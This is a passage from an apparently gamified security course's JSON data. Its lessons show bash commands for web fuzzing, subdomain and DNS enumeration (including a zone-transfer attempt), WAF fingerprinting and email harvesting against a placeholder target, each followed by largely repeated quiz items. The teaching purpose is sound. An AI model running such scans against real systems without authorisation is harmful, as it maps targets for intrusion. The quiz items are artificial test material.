80"],"ans":1}]},{"id":"g-recon-ffuf","cat":"Reconnaissance","title":"ffuf Web Fuzzer","diff":2,"xp":150,"intro":"Fast web fuzzer for directories, vhosts, and parameters.","sections":[{"type":"text","content":"Fast web fuzzer for directories, vhosts, and parameters."},{"type":"code","lang":"bash","content":"ffuf -u https://target.com/FUZZ -w wordlist.txt -mc 200,301\nffuf -u https://target.com -H 'Host: FUZZ.target.com' -w vhosts.txt\nffuf -u https://target.com/?FUZZ=test -w params.txt"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"ffuf's FUZZ keyword...","opts":["Is fixed","Marks where the wordlist value is inserted","Is optional","Is for encryption"],"ans":1},{"type":"quiz","q":"Subdomain enumeration helps find...","opts":["Passwords","Hidden services and attack surface","Firewall rules","User accounts"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan is best described as...","opts":["A vulnerability scanner","A search engine for internet-connected devices","A password cracker","An exploit framework"],"ans":1},{"type":"quiz","q":"What command shows DNS nameservers?","opts":["dig NS example.com","ping example.com","traceroute example.com","curl example.com"],"ans":0},{"type":"quiz","q":"Banner grabbing reveals...","opts":["User passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O attempts to detect...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","A DDoS technique","DNS enumeration"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware samples","Emails, names, IPs from public sources","Exploit code","Network packets"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"traceroute reveals...","opts":["Open ports","Network path (hops) to the target","Vulnerabilities","User accounts"],"ans":1},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP ports","Only TCP port 80"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1}]},{"id":"g-recon-gobuster","cat":"Reconnaissance","title":"Gobuster Directory Scanning","diff":1,"xp":75,"intro":"Find hidden directories and files.","sections":[{"type":"text","content":"Find hidden directories and files."},{"type":"code","lang":"bash","content":"gobuster dir -u https://target.com -w common.txt -x php,txt,bak\ngobuster dns -d target.com -w subdomains.txt\ngobuster vhost -u http://target -w vhosts.txt"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"The -x flag in gobuster adds...","opts":["Encryption","File extensions to check","Extra threads","Verbose output"],"ans":1},{"type":"quiz","q":"What does WHOIS provide?","opts":["Website content","Domain registration info","Server vulnerabilities","Network speed"],"ans":1},{"type":"quiz","q":"Subdomain enumeration helps find...","opts":["Passwords","Hidden services and attack surface","Firewall rules","User accounts"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan is best described as...","opts":["A vulnerability scanner","A search engine for internet-connected devices","A password cracker","An exploit framework"],"ans":1},{"type":"quiz","q":"What command shows DNS nameservers?","opts":["dig NS example.com","ping example.com","traceroute example.com","curl example.com"],"ans":0},{"type":"quiz","q":"Banner grabbing reveals...","opts":["User passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O attempts to detect...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","A DDoS technique","DNS enumeration"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware samples","Emails, names, IPs from public sources","Exploit code","Network packets"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"traceroute reveals...","opts":["Open ports","Network path (hops) to the target","Vulnerabilities","User accounts"],"ans":1},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1}]},{"id":"g-recon-dirsearch","cat":"Reconnaissance","title":"Dirsearch Content Discovery","diff":1,"xp":75,"intro":"Recursive web content discovery tool.","sections":[{"type":"text","content":"Recursive web content discovery tool."},{"type":"code","lang":"bash","content":"dirsearch -u https://target.com -e php,html,js\ndirsearch -u https://target.com -w custom-wordlist.txt"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"Dirsearch discovers...","opts":["Open ports","Hidden files, directories, and backup files","User accounts","DNS records"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP ports","Only TCP port 80"],"ans":1},{"type":"quiz","q":"What does WHOIS provide?","opts":["Website content","Domain registration info","Server vulnerabilities","Network speed"],"ans":1},{"type":"quiz","q":"Subdomain enumeration helps find...","opts":["Passwords","Hidden services and attack surface","Firewall rules","User accounts"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan is best described as...","opts":["A vulnerability scanner","A search engine for internet-connected devices","A password cracker","An exploit framework"],"ans":1},{"type":"quiz","q":"What command shows DNS nameservers?","opts":["dig NS example.com","ping example.com","traceroute example.com","curl example.com"],"ans":0},{"type":"quiz","q":"Banner grabbing reveals...","opts":["User passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O attempts to detect...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","A DDoS technique","DNS enumeration"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware samples","Emails, names, IPs from public sources","Exploit code","Network packets"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"traceroute reveals...","opts":["Open ports","Network path (hops) to the target","Vulnerabilities","User accounts"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1}]},{"id":"g-recon-feroxbuster","cat":"Reconnaissance","title":"Feroxbuster Recursive Scanner","diff":2,"xp":150,"intro":"Fast, recursive content discovery in Rust.","sections":[{"type":"text","content":"Fast, recursive content discovery in Rust."},{"type":"code","lang":"bash","content":"feroxbuster -u https://target.com -w wordlist.txt --depth 3\nferoxbuster -u https://target.com -w wordlist.txt -x php,bak,txt"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"Feroxbuster's advantage...","opts":["Simplicity","Fast Rust-based engine with recursive scanning","Python integration","GUI interface"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan is best described as...","opts":["A vulnerability scanner","A search engine for internet-connected devices","A password cracker","An exploit framework"],"ans":1},{"type":"quiz","q":"What command shows DNS nameservers?","opts":["dig NS example.com","ping example.com","traceroute example.com","curl example.com"],"ans":0},{"type":"quiz","q":"Banner grabbing reveals...","opts":["User passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O attempts to detect...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","A DDoS technique","DNS enumeration"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware samples","Emails, names, IPs from public sources","Exploit code","Network packets"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"traceroute reveals...","opts":["Open ports","Network path (hops) to the target","Vulnerabilities","User accounts"],"ans":1},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP ports","Only TCP port 80"],"ans":1},{"type":"quiz","q":"What does WHOIS provide?","opts":["Website content","Domain registration info","Server vulnerabilities","Network speed"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1}]},{"id":"g-recon-httpx","cat":"Reconnaissance","title":"httpx HTTP Toolkit","diff":2,"xp":150,"intro":"Fast HTTP probing for live hosts and tech detection.","sections":[{"type":"text","content":"Fast HTTP probing for live hosts and tech detection."},{"type":"code","lang":"bash","content":"cat urls.txt | httpx -status-code -title -tech-detect\ncat subs.txt | httpx -ports 80,443,8080,8443"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"httpx quickly identifies...","opts":["Vulnerabilities","Live web hosts, status codes, titles, and technologies","DNS records","Open ports"],"ans":1},{"type":"quiz","q":"Subdomain enumeration helps find...","opts":["Passwords","Hidden services and attack surface","Firewall rules","User accounts"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan is best described as...","opts":["A vulnerability scanner","A search engine for internet-connected devices","A password cracker","An exploit framework"],"ans":1},{"type":"quiz","q":"What command shows DNS nameservers?","opts":["dig NS example.com","ping example.com","traceroute example.com","curl example.com"],"ans":0},{"type":"quiz","q":"Banner grabbing reveals...","opts":["User passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O attempts to detect...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","A DDoS technique","DNS enumeration"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware samples","Emails, names, IPs from public sources","Exploit code","Network packets"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"traceroute reveals...","opts":["Open ports","Network path (hops) to the target","Vulnerabilities","User accounts"],"ans":1},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP ports","Only TCP port 80"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1}]},{"id":"g-recon-subfinder","cat":"Reconnaissance","title":"Subfinder Subdomain Discovery","diff":2,"xp":150,"intro":"Fast passive subdomain enumeration.","sections":[{"type":"text","content":"Fast passive subdomain enumeration."},{"type":"code","lang":"bash","content":"subfinder -d target.com -o subs.txt\nsubfinder -d target.com -all  # use all sources"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"Subfinder performs...","opts":["Active scanning","Passive subdomain enumeration from multiple sources","Exploitation","Port scanning"],"ans":1},{"type":"quiz","q":"What does WHOIS provide?","opts":["Website content","Domain registration info","Server vulnerabilities","Network speed"],"ans":1},{"type":"quiz","q":"Subdomain enumeration helps find...","opts":["Passwords","Hidden services and attack surface","Firewall rules","User accounts"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan is best described as...","opts":["A vulnerability scanner","A search engine for internet-connected devices","A password cracker","An exploit framework"],"ans":1},{"type":"quiz","q":"What command shows DNS nameservers?","opts":["dig NS example.com","ping example.com","traceroute example.com","curl example.com"],"ans":0},{"type":"quiz","q":"Banner grabbing reveals...","opts":["User passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O attempts to detect...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","A DDoS technique","DNS enumeration"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware samples","Emails, names, IPs from public sources","Exploit code","Network packets"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"traceroute reveals...","opts":["Open ports","Network path (hops) to the target","Vulnerabilities","User accounts"],"ans":1},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1}]},{"id":"g-recon-dnsrecon","cat":"Reconnaissance","title":"DNSRecon Advanced","diff":2,"xp":150,"intro":"Comprehensive DNS enumeration tool.","sections":[{"type":"text","content":"Comprehensive DNS enumeration tool."},{"type":"code","lang":"bash","content":"dnsrecon -d target.com -t std\ndnsrecon -d target.com -t brt -D subdomains.txt\ndnsrecon -d target.com -t axfr"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"DNSRecon's -t brt performs...","opts":["Zone transfer","Brute-force subdomain enumeration","Reverse lookup","Cache snooping"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan is best described as...","opts":["A vulnerability scanner","A search engine for internet-connected devices","A password cracker","An exploit framework"],"ans":1},{"type":"quiz","q":"What command shows DNS nameservers?","opts":["dig NS example.com","ping example.com","traceroute example.com","curl example.com"],"ans":0},{"type":"quiz","q":"Banner grabbing reveals...","opts":["User passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O attempts to detect...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","A DDoS technique","DNS enumeration"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware samples","Emails, names, IPs from public sources","Exploit code","Network packets"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"traceroute reveals...","opts":["Open ports","Network path (hops) to the target","Vulnerabilities","User accounts"],"ans":1},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP ports","Only TCP port 80"],"ans":1},{"type":"quiz","q":"What does WHOIS provide?","opts":["Website content","Domain registration info","Server vulnerabilities","Network speed"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1}]},{"id":"g-recon-wafw00f","cat":"Reconnaissance","title":"WAF Detection with wafw00f","diff":1,"xp":75,"intro":"Identify which WAF protects a web application.","sections":[{"type":"text","content":"Identify which WAF protects a web application."},{"type":"code","lang":"bash","content":"wafw00f https://target.com\nwafw00f -l  # list all detectable WAFs"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"Knowing the WAF helps...","opts":["Nothing","Choose bypass techniques specific to that WAF","Speed up scanning","Avoid detection"],"ans":1},{"type":"quiz","q":"Subdomain enumeration helps find...","opts":["Passwords","Hidden services and attack surface","Firewall rules","User accounts"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan is best described as...","opts":["A vulnerability scanner","A search engine for internet-connected devices","A password cracker","An exploit framework"],"ans":1},{"type":"quiz","q":"What command shows DNS nameservers?","opts":["dig NS example.com","ping example.com","traceroute example.com","curl example.com"],"ans":0},{"type":"quiz","q":"Banner grabbing reveals...","opts":["User passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O attempts to detect...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","A DDoS technique","DNS enumeration"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware samples","Emails, names, IPs from public sources","Exploit code","Network packets"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"traceroute reveals...","opts":["Open ports","Network path (hops) to the target","Vulnerabilities","User accounts"],"ans":1},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP ports","Only TCP port 80"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1}]},{"id":"g-recon-harvester","cat":"Reconnaissance","title":"theHarvester Advanced","diff":2,"xp":150,"intro":"Gather emails, names, IPs from multiple sources.","sections":[{"type":"text","content":"Gather emails, names, IPs from multiple sources."},{"type":"code","lang":"bash","content":"theHarvester -d target.com -b all -l 500\ntheHarvester -d target.com -b linkedin,google,bing"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"theHarvester collects...","opts":["Vulnerabilities","Emails, names, IPs, and subdomains from OSINT sources","Source code","Credentials"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail 